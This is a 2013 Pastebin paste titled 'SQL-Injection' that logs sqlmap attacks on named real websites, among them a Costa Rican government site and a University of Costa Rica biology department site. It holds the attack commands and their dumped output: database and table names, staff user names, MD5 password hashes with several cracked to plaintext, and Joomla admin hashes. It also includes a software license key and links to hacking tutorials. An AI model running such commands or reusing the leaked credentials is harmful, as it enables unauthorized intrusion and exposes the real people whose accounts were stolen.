API tools faq
paste
Advertisement
AnonCesc

SQL-Injection

AnonCesc
Jan 25th, 2013
200
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.00 KB | None | 0 0
raw download clone embed print report
  1. python sqlmap.py -u http://www.pyme.go.cr/informacion.php?id= -D pymecr -T usuario --columns
  2.  
  3. http://pastebin.com/YyGvSxYr
  4.  
  5. http://increinfo.blogspot.com/2012/03/inyeccion-sql-con-backtrack-5-hackear.html
  6.  
  7.  
  8.  
  9.  
  10.  
  11. python sqlmap.py -u http://www.biologia.ucr.ac.cr/cont.php?id= --dbs
  12.  
  13.  
  14. python sqlmap.py -u http://www.pyme.go.cr/informacion.php?id= -D pymecr -T usuario -C clave --dump
  15.  
  16. python sqlmap.py -u http://www.pyme.go.cr/informacion.php?id= -D pymecr --tables
  17.  
  18. [*] databasemeic
  19. [*] information_schema
  20. [*] mysql
  21. [*] pymecr
  22.  
  23. Database: pymecr
  24. [16 tables]
  25. +-------------+
  26. | cuadinicio1 |
  27. | cuadinicio2 |
  28. | cuadinicio3 |
  29. | cuadinicio4 |
  30. | cuadinicio5 |
  31. | cuadinicio6 |
  32. | menuiz1 |
  33. | menuiz2 |
  34. | menuiz3 |
  35. | menuiz4 |
  36. | menuiz5 |
  37. | menuiz6 |
  38. | menup1 |
  39. | noticias |
  40. | usuario |
  41. | videos |
  42. +-------------+
  43.  
  44. Database: pymecr
  45. Table: usuario
  46. [4 columns]
  47. +------------+-------------+
  48. | Column | Type |
  49. +------------+-------------+
  50. | clave | varchar(16) |
  51. | cookie | longtext |
  52. | id_usuario | int(11) |
  53. | usuario | varchar(50) |
  54. +------------+-------------+
  55.  
  56.  
  57. Table: usuario
  58. [1 entry]
  59. +----------+
  60. | clave |
  61. +----------+
  62. | 01101987 |
  63. +----------+
  64. @
  65. /opt/nessus/bin/nessus-fetch --register 7CC0-499B-4516-AD7D-81BE
  66. http://hotfixed.net/2011/05/18/nessus-metasploit-backtrack-5/
  67. http://increinfo.blogspot.com/2012/03/inyeccion-sql-con-backtrack-5-hackear.html
  68. http://foro.cl-security.net/hacked-exposed/hacked-joomla!-v-%281-6-x%29-metodo-facil-d-787/
  69. http://www.antioquia.gov.co/BancoHV/index.php/component/users/?view=registration
  70.  
  71.  
  72. python sqlmap.py -u www.sanews.gov.za/view.php?ID=03030516461008&coll=buanew03 --dbs
  73. python sqlmap.py -u http://www.biologia.ucr.ac.cr/cont.php?id= -D joomlaBIOLO --tables
  74. python sqlmap.py -u http://www.biologia.ucr.ac.cr/cont.php?id= -D joomlaBIOLO -T jos_users --columns
  75. python sqlmap.py -u http://www.biologia.ucr.ac.cr/cont.php?id= -D joomlaBIOLO -T jos_users -C password --dump
  76.  
  77.  
  78.  
  79.  
  80. http://www.biologia.ucr.ac.cr/cont.php?id=
  81. available databases [15]:
  82. [*] aeb
  83. [*] bioaula
  84. [*] biologia
  85. [*] bosquecito
  86. [*] calendario
  87. [*] descargas
  88. [*] information_schema
  89. [*] joomlaBioGen
  90. [*] joomlaBIOLO
  91. [*] mysql
  92. [*] padron
  93. [*] piwik
  94. [*] redmeso
  95. [*] sep
  96. [*] test
  97.  
  98.  
  99.  
  100. Database: biologia
  101. [54 tables]
  102. +--------------------------------------+
  103. | archivos |
  104. | bitacora_activos |
  105. | carreras |
  106. | categorias |
  107. | contenido |
  108. | cr_canton |
  109. | cr_distrito |
  110. | cr_provincias |
  111. | cursos_sigla_variada |
  112. | cursos_sigla_variada_detalles |
  113. | encuesta |
  114. | encuesta_area |
  115. | encuesta_preguntas |
  116. | encuesta_respuestas |
  117. | estudiantes |
  118. | estudiantes_anteproyectos |
  119. | estudiantes_consejeros |
  120. | estudiantes_enfasis |
  121. | estudiantes_exp_laboral |
  122. | estudiantes_formacion_academica |
  123. | estudiantes_formacion_complementaria |
  124. | estudiantes_grad_lic |
  125. | estudiantes_idiomas |
  126. | estudiantes_ofertas_laborales |
  127. | estudiantes_paq_informaticos |
  128. | estudiantes_publicaciones |
  129. | estudiantes_referencias |
  130. | estudiantes_tesis |
  131. | grados |
  132. | int_ambiental_onik |
  133. | inventario |
  134. | inventario_logs |
  135. | inventario_ubicacion |
  136. | inventario_ubicacion1 |
  137. | investigacion |
  138. | oficios |
  139. | personal_eb |
  140. | personal_eb_puestos |
  141. | piwik_option |
  142. | planes_estudio |
  143. | planes_estudios_optativos |
  144. | planes_estudios_optativos_titulo |
  145. | planes_estudios_titulo |
  146. | prestamo_equipo |
  147. | prestamo_equipo_detalle |
  148. | programas |
  149. | proyectos_investigacion |
  150. | suscripcion |
  151. | tareas |
  152. | tareas_comentarios |
  153. | tareas_status |
  154. | usuarios |
  155. | visitas |
  156. | visitas_sumario |
  157. +--------------------------------------+
  158.  
  159.  
  160.  
  161. Database: biologia
  162. Table: usuarios
  163. [22 columns]
  164. +---------------------------------+--------------+
  165. | Column | Type |
  166. +---------------------------------+--------------+
  167. | ftp | varchar(255) |
  168. | id | int(9) |
  169. | nombre | varchar(255) |
  170. | pass | varchar(255) |
  171. | permiso_autourl | int(2) |
  172. | permiso_bitacora_activos | int(2) |
  173. | permiso_calendario | int(1) |
  174. | permiso_correos | int(1) |
  175. | permiso_cursos_siglas_variables | int(11) |
  176. | permiso_ed_pagina | int(1) |
  177. | permiso_estudiantes | int(2) |
  178. | permiso_ftp | int(1) |
  179. | permiso_funcionarios | int(1) |
  180. | permiso_inventario | int(1) |
  181. | permiso_oferta_laboral | int(2) |
  182. | permiso_oficios | int(1) |
  183. | permiso_prestamo_equipo | int(1) |
  184. | permiso_proyectos_investigacion | int(11) |
  185. | permiso_tareas | int(1) |
  186. | puesto | varchar(255) |
  187. | tipo | int(1) |
  188. | usuario | varchar(255) |
  189. +---------------------------------+--------------+
  190.  
  191.  
  192.  
  193.  
  194. Database: biologia
  195. Table: usuarios
  196. [22 entries]
  197. +-----------+
  198. | usuario |
  199. +-----------+
  200. | Alejandra |
  201. | Bernal |
  202. | Carolina |
  203. | Dennis |
  204. | eddy |
  205. | Elsa |
  206. | Federico |
  207. | Francisco |
  208. | Freiser |
  209. | Gustavo |
  210. | hannia |
  211. | Hellen |
  212. | Jessica |
  213. | maualfa |
  214. | Mauricio |
  215. | Mercedes |
  216.  
  217.  
  218.  
  219.  
  220. Database: biologia
  221. Table: usuarios
  222. [22 entries]
  223. +--------------------------------------------+
  224. | pass |
  225. +--------------------------------------------+
  226. | 202cb962ac59075b964b07152d234b70 (123) |
  227. | 2bca18f97f8dd221bece305903735a8f (facil) |
  228. | 3599f026c6c3d5c3f5a434cdb4991974 (tulipan) |
  229. | 4fdd099c85cb9ba845aae634bc7557dd |
  230. | 5e875856361e9ad8092bf08c3ae8fe08 (Castro) |
  231. | 5fded24383cc6ad306bd3a2c9ebdba6c (peque13) |
  232. | 78ef43355f8015c336bcc0cd8d8f3ea2 |
  233. | 796144941995ef7bd70478c3f50a6cfd |
  234. | 796144941995ef7bd70478c3f50a6cfd |
  235. | 81dc9bdb52d04dc20036dbd8313ed055 (1234) |
  236. | 81dc9bdb52d04dc20036dbd8313ed055 (1234) |
  237. | 81dc9bdb52d04dc20036dbd8313ed055 (1234) |
  238. | 81dc9bdb52d04dc20036dbd8313ed055 (1234) |
  239. | 81dc9bdb52d04dc20036dbd8313ed055 (1234) |
  240. | 81dc9bdb52d04dc20036dbd8313ed055 (1234) |
  241. | 8cf4f2d5b34de3b84b4b9225c94deebe |
  242. | 984229b1e57c13b95a3e493be2442c26 (gus123) |
  243. | a19ceec04c3ff449b2f5ffb0c0526be2 |
  244. | aa47f8215c6f30a0dcdb2a36a9f4168e (daniel) |
  245. | badbca10cc3562d8cb391d353aba0050 |
  246. | e3c6c35d3b78aa04e4d36dc5399fb6aa |
  247. | f0467e856f9ee5f05a1815fca47b7787 (6616) |
  248. +--------------------------------------------+
  249.  
  250. Database: joomlaBIOLO
  251. Table: jos_users
  252. [13 columns]
  253. +---------------+---------------------+
  254. | Column | Type |
  255. +---------------+---------------------+
  256. | activation | varchar(100) |
  257. | block | tinyint(4) |
  258. | email | varchar(100) |
  259. | gid | tinyint(3) unsigned |
  260. | id | int(11) |
  261. | lastvisitDate | datetime |
  262. | name | varchar(255) |
  263. | params | text |
  264. | password | varchar(100) |
  265. | registerDate | datetime |
  266. | sendEmail | tinyint(4) |
  267. | username | varchar(150) |
  268. | usertype | varchar(25) |
  269. +---------------+---------------------+
  270.  
  271. Database: joomlaBIOLO
  272. Table: jos_users
  273. [13 entries]
  274. +-------------------------------------------------------------------+
  275. | password |
  276. +-------------------------------------------------------------------+
  277. | 10839272eb7307b147d5a5640411f7db:GoA2WWSyTNIRAjxohwqtLfusWWd0w0sm |
  278. | 182549c2240ee83f3c55365eefb67286:ANquxJtN4BlK06YFoQyAQjdTGQOUDCJr |
  279. | 415ee7f07f80c18a983cc336f8edbfac:LsWa5fRmYFFFVJnpKrY66aUNT6ZTlluc |
  280. | 63d800e4dc59ef637ae65307e4356e3c:qRQacui3Rwz6xvuremL1xa8HWFCQcf21 |
  281. | 80efad9428e2a5cebcd4a02f2718ca22:0mG1OvL2SHmgG7My4r4V6tpVCFXPl4eW |
  282. | 86c5cba711bbebc53e0f41596cf0521d:9G4L7aEZEahp7EbO1TgMnHeFwjgWtQ7G |
  283. | 8fdd88019fb6b2c3f97c04aaa8829c5d:3lChfZtpY4Cnl7UA1e2pHa2GbVAFumBn |
  284. | 9bd2413ae0cd7f4cbe23b29414fd025e:t3NK2ChqzXVDP6CJ48FMLODU4Cj7AnsS |
  285. | b0596aaa65cdd1cf9d3ffdb2f23121e7:0hruGQuV7QWusHQ0WmmXXloHJAaAxWtx |
  286. | b11308e56f9bee3f67530c00503dd04c:D0tcF1Q9QfM0X9qVKh1kmaWXKKdmRU6X |
  287. | e89312ceec78c3b34a4edda7e17fc9e9:1czpXI17COSs4mvkWsMGoa0YByZDBu0Z |
  288. | e8c7fa741654e82888cc5cc7c210a333:C2ngzUUzJ2JXoaxDDOoqUYSrWAvByoog |
  289. | fb6eb9599e856e4be6e15e24bc81e184:AIsY0FRiAGrJojCA4xXB1HOCfPDvWRQ8 |
  290. +-------------------------------------------------------------------+
  291.  
  292.  
  293. Database: joomlaBIOLO
  294. Table: jos_users
  295. [13 entries]
  296. +-----------+
  297. | username |
  298. +-----------+
  299. | admin |
  300. | Alejandra |
  301. | Bernal |
  302. | Carolina |
  303. | Dennis |
  304. | Elsa |
  305. | Federico |
  306. | Hannia |
  307. | Jessica |
  308. | maualfa |
  309. | Mercedes |
  310. | Milena |
  311. | Viviana |
  312. +-----------+
  313.  
  314. Utilizando Nessus con Metasploit
  315.  
  316. http://hacknode.blogspot.com/2011/08/utilizando-nessus-con-metasploit.html
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!